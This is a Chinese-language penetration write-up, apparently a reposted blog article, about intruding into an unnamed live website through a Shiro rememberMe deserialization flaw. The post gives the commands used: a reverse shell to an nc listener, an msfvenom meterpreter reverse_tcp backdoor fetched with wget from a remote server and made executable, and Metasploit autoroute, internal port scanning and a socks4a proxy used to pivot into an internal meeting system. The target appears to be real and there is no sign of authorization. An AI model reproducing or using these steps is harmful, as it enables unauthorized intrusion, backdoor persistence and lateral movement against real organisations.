实战|某网站shiro反序列化漏洞的渗透过程

技术

打进内网以后 的过程没有继续深入搞,具体原因大家懂的,

前期打点,开始的想法是爆破个弱口令的,弱口令爆破一圈没有找到有用的账户,

picture.image

返回包存在 :Set-Cookie: rememberMe=deleteMe; 参数, 测试一下 shiro漏洞,万一没修复就捡到了,美滋滋

成功打到DNSLOG 返回信息

picture.image

得到log,确定漏洞是存在的,脚本写入linux反弹shell的命令,

vps 开启NC 监听 nc -lvp 777 成功返回

picture.image

获得服务器权限 root ,开始通过dnslog 知道服务器是通外网的,利用msf 生成 elf 后门


          
              

            msfvenom -p linux/x64/meterpreter/reverse\_tcp LHOST=IP LPORT=端口 -f elf > 123.elf
          
        

关注公众号:hack之道,后台回复关键词:666,获取最新渗透教程和工具。

把生成好的后门放在远程HTTP服务上面,

在shell里,wget 远程下载

picture.image

成功下载以后,chmod 给后门权限 777 就行,-rwxrwxrwx 1 root root

picture.image

msf 运行命令 use exploit/multi/handler 获得shell反弹地址

set payload linux/x64/meterpreter/reverse_tcp

地址填写VPS 端口写后门端口就好了,直接run

picture.image

查看内网路由,添加路由命令


            
run get_local_subnets //获取路由地址
            
run autoroute -s xxx.xxx.xxx.xxx/24 //添加路由
            
run autoroute -p //查看添加的路由
            
run autorouute -d //删除添加的路由
        

picture.image

内网扫描端口 use auxiliary/scanner/portscan/tcp

picture.image

利用msf socks4a模块代理


            
use auxiliary/server/socks4a 
            
set SRVHOST IP
            
set SRVPORT 端口
        

运行返回信息:


            
msf5 auxiliary(server/socks4a) > run
            
[*] Auxiliary module running as background job 0.
            
[*] Starting the socks4a proxy server
        

本地利用代理连接 代理的服务器 设置好端口 ,浏览器访问

某会议系统

picture.image


          
作者:时光与她Time
          
链接:https://www.jianshu.com/p/43623c4daa3c
      

推荐阅读

XSS 实战思路总结

内网信息收集总结

xss攻击、绕过最全总结

一些webshell免杀的技巧

命令执行写webshell总结

SQL手工注入总结 必须收藏

后台getshell常用技巧总结

web渗透之发现内网有大鱼

蚁剑特征性信息修改简单过WAF

查看更多精彩内容,还请关注 橘猫学安全

每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“ 再看 picture.image

0
0
0
0
关于作者

文章

0

获赞

0

收藏

0

相关资源
字节跳动云原生降本增效实践
本次分享主要介绍字节跳动如何利用云原生技术不断提升资源利用效率,降低基础设施成本;并重点分享字节跳动云原生团队在构建超大规模云原生系统过程中遇到的问题和相关解决方案,以及过程中回馈社区和客户的一系列开源项目和产品。
相关产品
评论
未登录
看完啦,登录分享一下感受吧~
暂无评论